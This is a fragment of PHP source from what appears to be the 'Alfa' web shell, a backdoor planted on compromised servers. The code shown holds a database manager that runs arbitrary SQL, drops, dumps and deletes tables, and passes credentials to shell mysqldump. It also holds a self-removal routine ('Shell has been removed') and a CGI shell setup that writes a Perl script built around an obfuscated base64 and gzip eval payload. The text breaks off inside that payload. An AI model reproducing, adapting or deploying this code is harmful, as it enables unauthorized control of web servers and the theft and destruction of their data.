$_POST[\'current_mysql_id\'];\r\necho "</td>\r\n<td><button onclick=\'fs(this);return false;\' class=\'db-opt-id db-connect-btn\'>Connect</button></td>\r\n<td><input type=\'checkbox\' name=\'sql_count\' value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> <div class=\\"txtfont\\">count the number of rows</div></td>\r\n</tr>\r\n</table>";\r\nif($db->mysqli_connect_error){\r\n\techo \'<div style="text-align: center;font-size: 17px;margin-top: 18px;">\'.$db->mysqli_connect_error_msg.\'</div>\';\r\n}\r\nif(!empty($curr_mysql_id)){\r\n\t$sql_title_db = "";\r\n\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t$sql_title_db = "d.querySelector(\'#tab_".$curr_mysql_id." span\').innerHTML=\'".addslashes($_POST[\'sql_base\'])."\';";\r\n\t}\r\n\techo "<script>mysql_cache[\'".$curr_mysql_id."\'][\'host\']=\'".addslashes($_POST[\'sql_host\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'user\']=\'".addslashes($_POST[\'sql_login\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'pass\']=\'".addslashes($_POST[\'sql_pass\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'db\']=\'".addslashes($_POST[\'sql_base\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'charset\']=\'".addslashes($_POST[\'charset\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'type\']=\'".addslashes($_POST[\'type\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'count\']=\'".addslashes($_POST[\'sql_count\'])."\';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";\r\n}\r\nif(isset($db) && $db->link){\r\nif(!empty($_POST[\'sql_base\'])){\r\necho "<div class=\'mysql-main\'><div mode=\'block\' onclick=\'alfaMysqlTablePanelCtl(this);\' class=\'tables-panel-ctl db-opt-id\'>&#x3C;&#x3C;</div><div class=\'mysql-tables\'><div><input placeholder=\\"Filter Table\\" style=\'padding: 0;margin-left: 11px;text-align:center;\' type=\'text\' name=\'filter_all\'><button class=\'db-opt-id\' onclick=\'alfaMysqlFilterAllTable(this);return false;\'>Search</button></div><div class=\'block\'><a sql_count=\'".(empty($_POST[\'sql_count\'])?"false":"true")."\' mode=\'closed\' onclick=\'alfaMysqlFilterAllTable(this,true);\' class=\'expander parent-expander db-opt-id\' href=\'javascript:void(0);\'><img src=\'http://solevisible.com/icons/menu/b_plus.png\' title=\'Expand/Collapse All DataBases\' alt=\'Expand/Collapse All DataBases\'></a></div><ul style=\'margin-top: 28px;\'>";\r\nforeach ($database_list as $db_name) {\r\n\techo \'<li><div class="block"><i></i><b></b><a sql_count="\'.(empty($_POST[\'sql_count\'])?"false":"true").\'" db_target="\'.$db_name.\'" onclick="alfaMysqlExpander(this);" class="expander cls-\'.$db_name.\'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/\'.($db_name == $_POST[\'sql_base\']?"b_minus.png":"b_plus.png").\'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">\'.$db_name.\'</span><div class="clearfloat"></div><div db_name="\'.$db_name.\'" mode="\'.($db_name == $_POST[\'sql_base\']?"loaded":"no").\'" class="list_container cls-\'.$db_name.\'"><div>\';\r\n\tif($db_name == $_POST[\'sql_base\']){\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t$tbls_res = $db->listTables();\r\n\t\techo \'<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-\'.$db_name.\'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>\';\r\n\t\twhile($item = $db->fetch($tbls_res)){\r\n\t\tlist($key, $value) = each($item);\r\n\t\tif(!empty($_POST[\'sql_count\']))\r\n\t\t$n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM `\'.$value.\'`\'));\r\n\t\t$value = htmlspecialchars($value);\r\n\t\techo "<li><div class=\'block\'><i></i><b></b></div><div class=\'tables-row\'><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;<a class=\'db-opt-id\' db_target=\'".$db_name."\' href=\'javascript:void(0);\' onclick=\\"alfaLoadTableData(this,\'".$value."\')\\"><span class=\'mysql_tables\' style=\'font-weight:unset;\'>".$value."</span></a>" . (empty($_POST[\'sql_count\'])?\'&nbsp;\':" <small><span style=\'font-weight:unset;\' class=\'mysql_table_count\'>({$n[\'n\']})</span></small>") . "</div></li>";\r\n\t\t}\r\n\t\techo \'</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-\'.$db_name.\'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-\'.$db_name.\'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="\'.$db_name.\'" target=".cls-\'.$db_name.\'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>\';\r\n\t}\r\n\techo "</div></li>";\r\n}\r\necho "</ul></div><div class=\'mysql-query-results\'><div class=\'mysql-query-result-tabs\'><div class=\'db-opt-id mysql-query-selected-tab\' target=\'.mysql-query-result-content\' onclick=\'alfaMysqlTabCtl(this);\'>Result</div><div class=\'db-opt-id\' target=\'.mysql-query-form\' onclick=\'alfaMysqlTabCtl(this);\'>Query</div><div class=\'db-opt-id\' target=\'.mysql-search-area\' onclick=\'alfaMysqlTabCtl(this);\'>Search</div><div class=\'db-opt-id\' target=\'.mysql-structure\' onclick=\'alfaMysqlTabCtl(this);\'>Structure</div><div class=\'db-opt-id\' target=\'.mysql-insert-row\' onclick=\'alfaMysqlTabCtl(this);\'>Insert</div><div style=\'display:none;\' class=\'db-opt-id\' target=\'.mysql-edit-row\' onclick=\'alfaMysqlTabCtl(this);\'>Edit</div></div><div class=\'mysql-query-content mysql-insert-row mysql-hide-content\'></div><div class=\'mysql-query-content mysql-edit-row mysql-hide-content\'></div><div class=\'mysql-query-content mysql-search-area mysql-hide-content\'></div><div class=\'mysql-query-content mysql-structure mysql-hide-content\'></div><div class=\'mysql-query-content mysql-query-form mysql-hide-content\'><div style=\'margin-bottom: 5px;\'><span>Query:</span></div><textarea name=\'query\' style=\'width:90%;height:100px\'></textarea><p><div style=\'float:left;margin-left: 30px;\'><input class=\'button db-opt-id\' db_target=\'".$_POST[\'sql_base\']."\' onclick=\'alfaMysqlQuery(this);return false;\' type=\'submit\' value=\' \'></div></p></div><div class=\'mysql-query-content mysql-query-result-content\'><div class=\'mysql-query-result-header\'><div style=\'margin-bottom: 10px;\' class=\'mysql-query-reporter\'></div><div class=\'mysql-query-pager\'></div></div><div class=\'mysql-query-table\'></div></div></form></td></tr>";\r\n}\r\necho "</table></div>";\r\necho "</div>";\r\n}else{\r\necho htmlspecialchars($db->error());\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaSql_manager_api(){\r\n\t$db = $_POST["alfa1"];\r\n\t$type = $_POST["alfa2"];\r\n\t$sql_count = $_POST["alfa3"] == "true" ? true : false;\r\n\t$db = @json_decode($db, true);\r\n\t$conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);\r\n\t@mysqli_set_charset($conn, "utf8");\r\n\tif($conn){\r\n\t\tif($type == "load_all_tables"){\r\n\t\t\t$tables = array();\r\n\t\t\t$q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN (\'".implode("\',\'", $db["databases"])."\');");\r\n\t\t\t$count = 0;\r\n\t\t\twhile($row = @mysqli_fetch_assoc($q_tables)){\r\n\t\t\t\tif($sql_count){\r\n\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row["table_schema"].\'`.`\'.$row["table_name"].\'`\');\r\n\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);\r\n\t\t\t}\r\n\t\t\tforeach($db["databases"] as $db){\r\n\t\t\t\tif(!isset($tables[$db])){\r\n\t\t\t\t\t$tables[$db] = null;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo @json_encode($tables);\r\n\t\t}elseif($type == "dump_drop"){\r\n\t\t\tif($db["mode"] == "drop"){\r\n\t\t\t\tforeach ($db["tables"] as $table) {\r\n\t\t\t\t\t@mysqli_query($conn, "DROP TABLE `".$table."`;");\r\n\t\t\t\t}\r\n\t\t\t\t$tables = array();\r\n\t\t\t\t$q_tables = @mysqli_query($conn, "SHOW TABLES;");\r\n\t\t\t\t$count = 0;\r\n\t\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\r\n\t\t\t\t\tif($sql_count){\r\n\t\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row[0].\'`\');\r\n\t\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$tables[] = array("name" => $row[0], "count" => (int)$count);\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode($tables);\r\n\t\t\t}else{\r\n\t\t\t\tif(strlen(alfaEx("mysqldump"))>0){\r\n\t\t\t\t\talfaEx("mysqldump --single-transaction --host=\\"".$db["host"]."\\" --user=\\"".$db["user"]."\\" --password=\\"".$db["pass"]."\\" ".$db["db"]." ".implode(" ", $db["tables"])."  > ".$db["dump_file"]);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$fp = @fopen($db["dump_file"], "w");\r\n\t\t\t\t\tforeach ($db["tables"] as $table) {\r\n\t\t\t\t\t\t$res = @mysqli_query($conn, \'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t\t$create = @mysqli_fetch_array($res);\r\n\t\t\t\t\t\t$sql = "DROP TABLE IF EXISTS `".$table."`;\\n" . $create[1].";\\n";\r\n\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t\t$tbl_data = @mysqli_query($conn, \'SELECT * FROM `\'.$table.\'`\');\r\n\t\t\t\t\t\t$head = true;\r\n\t\t\t\t\t\twhile($item = @mysqli_fetch_assoc($tbl_data)){\r\n\t\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\tif($v == null)\r\n\t\t\t\t\t\t\t$item[$k] = "\'\'";\r\n\t\t\t\t\t\t\telseif(is_numeric($v))\r\n\t\t\t\t\t\t\t$item[$k] = $v;\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t$item[$k] = "\'".@mysqli_real_escape_string($conn, $v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tif($head) {\r\n\t\t\t\t\t\t\t$sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n\t\t\t\t\t\t\t$head = false;\r\n\t\t\t\t\t\t\t} else\r\n\t\t\t\t\t\t\t$sql = "\\n\\t,(".implode(", ", $item).\')\';\r\n\t\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tif(!$head)\r\n\t\t\t\t\t\t\tif($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode(array("status" => true, "file" => $db["dump_file"]));\r\n\t\t\t}\r\n\t\t}elseif($type == "load_tables"){\r\n\t\t\t$tables = array();\r\n\t\t\t$q_tables = @mysqli_query($conn, "SHOW TABLES;");\r\n\t\t\t$count = 0;\r\n\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\r\n\t\t\t\tif($sql_count){\r\n\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row[0].\'`\');\r\n\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tables[] = array("name" => $row[0], "count" => (int)$count);\r\n\t\t\t}\r\n\t\t\techo @json_encode($tables);\r\n\t\t}elseif($type == "alter"){\r\n\t\t\t$db["alter"]["type"] = strtolower($db["alter"]["type"]);\r\n\t\t\t$inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";\r\n\t\t\t$text_input = array("longtext", "text", "mediumtext", "tinytext");\r\n\t\t\tif(in_array($db["alter"]["type"], $text_input)){\r\n\t\t\t\t$inputs = $db["alter"]["type"];\r\n\t\t\t}\r\n\t\t\t@mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);\r\n\t\t\t$error = @mysqli_error($conn);\r\n\t\t\tif($error){\r\n\t\t\t\techo $error;\r\n\t\t\t}else{\r\n\t\t\t\techo "ok";\r\n\t\t\t}\r\n\t\t}elseif($type == "edit" || $type == "delete" || $type == "delete_all"){\r\n\t\t\tif($type == "edit"){\r\n\t\t\t\t$q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = \'".addslashes($db["key"])."\' LIMIT 0,1");\r\n\t\t\t\t$row = @mysqli_fetch_assoc($q);\r\n\t\t\t\tif($row){\r\n\t\t\t\t\t$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = \'".$db["db"]."\' AND `TABLE_NAME` = \'".$db["table"]."\'");\r\n\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t$edit_data = array();\r\n\t\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t\t\t\t$input = array("col_type" => $row2["COLUMN_TYPE"]);\r\n\t\t\t\t\t\t$row2["type"] = strtolower($row2["type"]);\r\n\t\t\t\t\t\tswitch($row2["type"]){\r\n\t\t\t\t\t\t\tcase "longtext": case "text": case "mediumtext": case "tinytext":\r\n\t\t\t\t\t\t\t\t$input["tag"] = "textarea";\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\tcase "int": case "smallint": case "bigint": case "tinyint": case "mediumint":\r\n\t\t\t\t\t\t\t\t$input["tag"] = "input";\r\n\t\t\t\t\t\t\t\t$input["type"] = "number";\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\tdefault:\r\n\t\t\t\t\t\t\t\t$input["tag"] = "input";\r\n\t\t\t\t\t\t\t\t$input["type"] = "text";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$columns[$row2["name"]] = $input;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($row as $key => $v){\r\n\t\t\t\t\t\t$edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, \'UTF-8\'), "type" => $columns[$key]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo @json_encode($edit_data);\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\tif($type == "delete_all"){\r\n\t\t\t\t\t$rows = implode("\', \'", $db["rows"]);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$rows = addslashes($db["key"]);\r\n\t\t\t\t}\r\n\t\t\t\t$query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN (\'".$rows."\')";\r\n\t\t\t\t@mysqli_query($conn, $query);\r\n\t\t\t\t$error = @mysqli_error($conn);\r\n\t\t\t\tif($error){\r\n\t\t\t\t \t$status = false;\r\n\t\t\t\t}else{\r\n\t\t\t\t \t$status = true;\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode(array("status" => $status, "error" => $error, "query" => $query));\r\n\t\t\t}\r\n\t\t}elseif($type == "update"){\r\n\t\t\t$query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";\r\n\t\t\tforeach($db["data"] as $col => $val){\r\n\t\t\t\t$query .= "`".$col."` = \'".mysqli_real_escape_string($conn, $val)."\',";\r\n\t\t\t}\r\n\t\t\t$query = substr($query, 0, -1);\r\n\t\t    $query .= "WHERE `".$db["col_key"]."` = \'".$db["key"]."\'";\r\n\t\t\t$res = @mysqli_query($conn, $query);\r\n\t\t\techo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));\r\n\t\t}elseif($type == "insert"){\r\n\t\t\t$query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";\r\n\t\t\tforeach($db["data"] as $col => $val){\r\n\t\t\t\t$cols .= $col . ",";\r\n\t\t\t\t$vals .= "\'".mysqli_real_escape_string($conn, $val)."\',";\r\n\t\t\t}\r\n\t\t\t$cols = substr($cols, 0, -1);\r\n\t\t\t$vals = substr($vals, 0, -1);\r\n\t\t\t$query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";\r\n\t\t\t$res = @mysqli_query($conn, $query);\r\n\t\t\techo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));\r\n\t\t}else{\r\n\t\t\t$pages = 0;\r\n\t\t\t$title = false;\r\n\t\t\t$query = "";\r\n\t\t\t$tbl_content = \'<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">\';\r\n\t\t\t$line = 0;\r\n\t\t\t$tables = array();\r\n\t\t\t$columns = array();\r\n\t\t\tif($type == "load_data"){\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";\r\n\t\t\t\t$tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");\r\n\t\t\t\t$tbl_count = @mysqli_fetch_row($tbl_count_q);\r\n\t\t\t\t$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = \'".$db["db"]."\' AND `TABLE_NAME` = \'".$db["table"]."\'");\r\n\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t\t\t$columns[] = $row2;\r\n\t\t\t\t}\r\n\t\t\t\tif($tbl_count[0] > 30){\r\n\t\t\t\t\t$pages = ceil($tbl_count[0] / 30);\r\n\t\t\t\t}\r\n\t\t\t}elseif($type == "query"){\r\n\t\t\t\t$query = $db["query"];\r\n\t\t\t}elseif($type == "page"){\r\n\t\t\t\t$db["page"] = (int)$db["page"] - 1;\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";\r\n\t\t\t}elseif($type == "search"){\r\n\t\t\t\t$search = "";\r\n\t\t\t\t$search_noval = array("= \'\'", "!= \'\'", "IS NULL", "IS NOT NULL");\r\n\t\t\t\tforeach($db["search"] as $col => $val){\r\n\t\t\t\t\t$search_noval_r = in_array($val["opt"], $search_noval);\r\n\t\t\t\t\tif(empty($val["value"]) && !$search_noval_r)continue;\r\n\t\t\t\t\tif(strstr($val["opt"], "...") || $search_noval_r){\r\n\t\t\t\t\t\t$val["opt"] = str_replace("...", $val["value"], $val["opt"]);\r\n\t\t\t\t\t\t$search .= $col . " " . $val["opt"] . " AND ";\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$search .= $col . " " . $val["opt"] . " \'".addslashes($val["value"])."\' AND ";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$search .= "1=1";\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;\r\n\t\t\t}\r\n\t\t\t$q_tables = @mysqli_query($conn, $query);\r\n\t\t\tif(!$q_tables){\r\n\t\t\t\techo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t\t$col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = \'".@addslashes($db["db"])."\' AND TABLE_NAME = \'".@addslashes($db["table"])."\' AND COLUMN_KEY = \'PRI\'");\r\n\t\t\tif($col_key){\r\n\t\t\t\t$col_key = @mysqli_fetch_row($col_key);\r\n\t\t\t\t$col_key = $col_key[0];\r\n\t\t\t\tif(!empty($col_key)){\r\n\t\t\t\t\t$tbl_content = \'<div style="margin-bottom:5px;margin-top:5px;"><button col_key="\'.$col_key.\'" tbl_name="\'.$db["table"].\'" db_id="\'.$db["db_id"].\'" \tdb_target="\'.$db["db"].\'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">\';\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\t$col_key = false;\r\n\t\t\t}\r\n\t\t\twhile($item = @mysqli_fetch_assoc($q_tables)){\r\n\t\t\t\tif(!$title){\r\n\t\t\t\t\t$tbl_content .= \'<tr style="background-color:#305b8e;">\';\r\n\t\t\t\t\tif($col_key){\r\n\t\t\t\t\t\t$tbl_content .= \'<th style="width: 55px;text-align:center;"><input db_id="\'.$db["db_id"].\'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($item as $key => $value){\r\n\t\t\t\t\t\t$tbl_content .= \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\treset($item);\r\n\t\t\t\t\t$title=true;\r\n\t\t\t\t\t$tbl_content .= \'</tr><tr>\';\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif($col_key){\r\n\t\t\t\t\t$cacheMsg = \'<td style="text-align:center;"><input row_id="\'.$line.\'" type="checkbox" name="tbl_rows_checkbox[]" value="\'.$item[$col_key].\'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="\'.$db["db_id"].\'" db_target="\'.$db["db"].\'" tbl_name="\'.$db["table"].\'" col_key="\'.$col_key.\'" key="\'.$item[$col_key].\'" onclick="alfaMysqlEditRow(this, \\\'edit\\\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="\'.$db["db_id"].\'" db_target="\'.$db["db"].\'" tbl_name="\'.$db["table"].\'" col_key="\'.$col_key.\'" key="\'.$item[$col_key].\'" row_id="\'.$line.\'" onclick="alfaMysqlEditRow(this, \\\'delete\\\');" style="color:#ff1e1e;">Delete</a></td>\';\r\n\t\t\t\t}\r\n\t\t\t\t$tbl_content .= \'<tr class="tbl_row tbl_row_l\'.$line.\'">\'.$cacheMsg;\r\n\t\t\t\t$line++;\r\n\t\t\t\tforeach($item as $key => $value){\r\n\t\t\t\t\tif($value == null){\r\n\t\t\t\t\t\t$tbl_content .= \'<td><i>null</i></td>\';\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$tbl_content .= \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tbl_content .= \'</tr>\';\r\n\t\t\t}\r\n\t\t\t$tbl_content .= \'</table>\';\r\n\t\t\tif(!$title){\r\n\t\t\t\t$tbl_content = "<div style=\'padding:5px;border:1px dashed;margin:10px;\'>Table is empty...</div>";\r\n\t\t\t}\r\n\t\t\techo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));\r\n\t\t}\r\n\t\t@mysqli_close($conn);\r\n\t}\r\n}\r\nfunction alfaselfrm(){\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'yes\'){\r\necho(__pre().\'<center>\');\r\nif(@unlink($GLOBALS[\'__file_path\'])){\r\necho(\'<b>Shell has been removed</i> :)</b>\');\r\n}else{\r\necho \'unlink error!\';\r\n}\r\necho(\'</center>\');\r\n}\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']!=\'yes\'){\r\necho "<div class=header>";\r\necho "\r\n<center><p><img src=\\"http://solevisible.com/images/farvahar-iran.png\\"></p>";\r\necho \'<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\\\'selfrm\\\',null,\\\'yes\\\');"> Yes</a>\';\r\necho \'</p></center></div>\';\r\n}\r\n}\r\nfunction alfacgishell(){\r\nalfahead();\r\n$div = "";\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\nif(!in_array($_POST[\'alfa1\'],array(\'perl\',\'py\'))){\r\n$div = "</div>";\r\necho \'<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\\\'perl\\\')">| Perl | </a><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\\\'py\\\');">| Python | </a>\';\r\n}\r\nif(isset($_POST[\'alfa1\'])&&in_array($_POST[\'alfa1\'],array(\'perl\',\'py\'))){\r\n@mkdir(\'cgialfa\',0755);\r\n@chdir(\'cgialfa\');\r\nalfacgihtaccess(\'cgi\');\r\n$name = $_POST[\'alfa1\'].\'.alfa\';\r\n$perl = \'#!/usr/bin/perl   -I/usr/local/bandmin\'."\\n".\'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/6UZDXfTRvKvLBthSRBbtktazrJcQuJA3iUhlxju9aJgZGlt70OWVH2QpMb97Tezu7KkEKC0yUORZud7ZmdmlyJj5PT4dDwYvPQy9vMzuwDAEQ+ZBETeignQwU1AdG+WTRMvX+q25i/4NOApcQg8EcsoFw2ta5q29l8enU1guWtrZ5ODVXDJEviiLWprbyN+W0FsgBzEq5UXBRO+YnGRHxapl/M4gtUekF8u45vDO5DB/TdFnhQ5wm0NtBKC4WvB8jBe8Ih8/ozvyU3BA0MbmvhNvXDuoYhSoKFU+5VUig1ITSlTIJ+DwXVk6gcU8GhyE1DAOAdL7/OjritQLES4YOAY5udx2sQh/VGrR3qjVl/g4ltPwIAoK2bkgnnBuZeCy9dh7HshMZ7wyAQeL6aEz+FpK7DGd4kG7/D8yO7g+ckLQe5pEeY88dL8KE5Xh17uAak2Pnu31g/enE3GZ5Pp5Lfzsb4hzp/EWpXIrjUH9HYA+DaZxUUUeOmdY3Semppl87khOVyM//N2fDmZno4nr98cAg/2O6GvxhNqrjUebQUB0sVv08vJxfHZK31jb1iYfZvF+ZtL5JGC6cbl5PD4DKzh0e49vU/GZ68mr/WNaW+27P6uTaDwSwUBtfV2W+9oPftFyDPMriwJeW5YWxRL6APOfQ0asvRlHCCVhthXvesmGDRwUzfCf5/hT2SVy0jxwdZKYr18/ZNkgkKzAJVHa30Ouw+VRnuIQKpYAHdcxrx3XIq2uLQkk/i92pdgTS1rcR+WIQy8A0nk9G1licav4ZU/fQrOKQES/33nqZAoVKwvAXfDvVFKQBYqBSATlYniDVkY742GW0zzswBo8KWZQsUt7mOj0zGtxPM/GtSnu2TJbg2tZ5rWgglDUJKwFSjsDaYXW78Q+acC1yoDBiYyz1/CBzG6pNMh2g6AMVkr49ynFgHxRm0XVZwcyQmxd0nfVEZ+V8kfNKUDZdDtUtzfRsDmPGJQvspVLKZ1TGX1BovF2ySMvQDL9dpfxomhTbwUCuAZBMsU3GoAdNhBkaYsyg95aqJ+K+vKdV3rGva4Nkm9KJuzFJmJtUfG1XvrvetePzG1R3adESqh6h/uGrWEhJf8D5TDo9yAJF1gM2hmtEksqOn9ZyYWlThhkfH2/OTN/uHR8cl4l9BRTQw1zfWMR6s4YDUkYZaspnaSgiBSrZF7wmw/jLMGsSKhpbEsIPe1//fLjhtRhahPlowgQ0L1zkz1w4aXOzolN15GChEJ4JcVvs+ybF6E4V1Hl8mppB55qBr0mkfUlvE7xwUUrQIJ9YqsNSxbWJWGPsSKpaOhAMQRUKx47tB8ybOO/OgEPPNmwNXJ04LZYiXoQIYUzJnlsWcUEct8L2EGi3zw5NuLY+i1SRwBZ6OObUKaUQJI+V3CHLotolUNpWTF8mUcOLJcE8/HHu2AY7RLP+VJfgJ9CUHgktEw9GYsJEDsUOWaFKBZ4kWEA4vpdI6uLBIAWggdkWGWp3G0GLWiWZbY8nmwjCGCxBMxAESJMbQE99GQRzgNZPldCCqDJ5LQuxtEYByYglK2ksF5/tKLFogW+8UKrO9ABMchw9eXd8eB4epbnVzd7PAoYunryemJI7yE8rOr7nVHDESUSC8hlBJRGumckgzyx6E/7dFSM7kiI1XSlF8yRkrFLYXEWfIgYFHJOdgig6urHSzc/HUq70sRIpbwR6WVLhr7FKwSTThleZFGog3jCxFpaNcTWEGqzD33Fkx2prU2FvkVVPo16439EIJoD